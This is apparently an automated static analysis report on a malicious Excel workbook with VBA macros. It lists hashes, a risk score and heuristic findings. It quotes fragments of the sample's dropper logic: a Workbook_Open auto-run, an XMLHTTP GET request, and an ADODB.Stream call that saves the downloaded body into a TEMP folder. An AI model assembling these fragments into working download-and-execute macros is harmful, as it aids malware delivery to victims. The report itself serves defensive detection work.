Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ca4dcdff941bbb59…

MALICIOUS

Office (OOXML)

6.98 MB Created: 2018-07-24 19:22:46 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-06-28
MD5: 02794c6752cee7958fbbb0fdf8cec498 SHA-1: 50c1f686a4cb25c5c31d413e4481007cf2531ebe SHA-256: ca4dcdff941bbb591c85fff32d162646971774333346cb775a9a94879066d2a8
196 Risk Score

Heuristics 10

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        oStream.Type = 1
    oStream.Write WinHttpReq.responseBody
    oStream.SaveToFile targetFileXLSX, 2 ' 1 = no overwrite, 2 = overwrite
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", URL, False
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Workbook_Open()
SplashScreen.Show
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    targetFolder = VBA.Environ("TEMP") & "\" & RandomString(6) & "\"
MkDir targetFolder
  • External hyperlinks (3) low OOXML_EXTERNAL_HYPERLINKS
    Document contains 3 external hyperlinks — clickable URLs are stored as external relationships. First target: https://www.coinbase.com/join/5a4c053c2ed86105b1bac21a?src=ios-link
  • Hidden worksheet (veryHidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 3 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Large OOXML part skipped info SCAN_INCOMPLETE
    One or more high-value OOXML parts exceeded the scanner's per-entry size cap and may not have been fully inspected.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.imagemagick.org.��z Referenced by macro
    • https://etoro.tw/2L4Kwq3Referenced by macro
    • http://www.w3.org/2000/svgReferenced by macro
    • http://www.w3.org/1999/xlinkReferenced by macro
    • http://schemas.microsoft.com/office/2006/01/customuiReferenced by macro
    • https://en.wikipedia.org/wiki/File:ATP_World_Tour.png�W]�Referenced by macro
    • https://www.coinbase.com/join/5a4c053c2ed86105b1bac21a?src=ios-linkReferenced by macro
    • https://www.binance.com/?ref=18552868Referenced by macro

Open this report in the interactive analyzer, or submit your own file for analysis.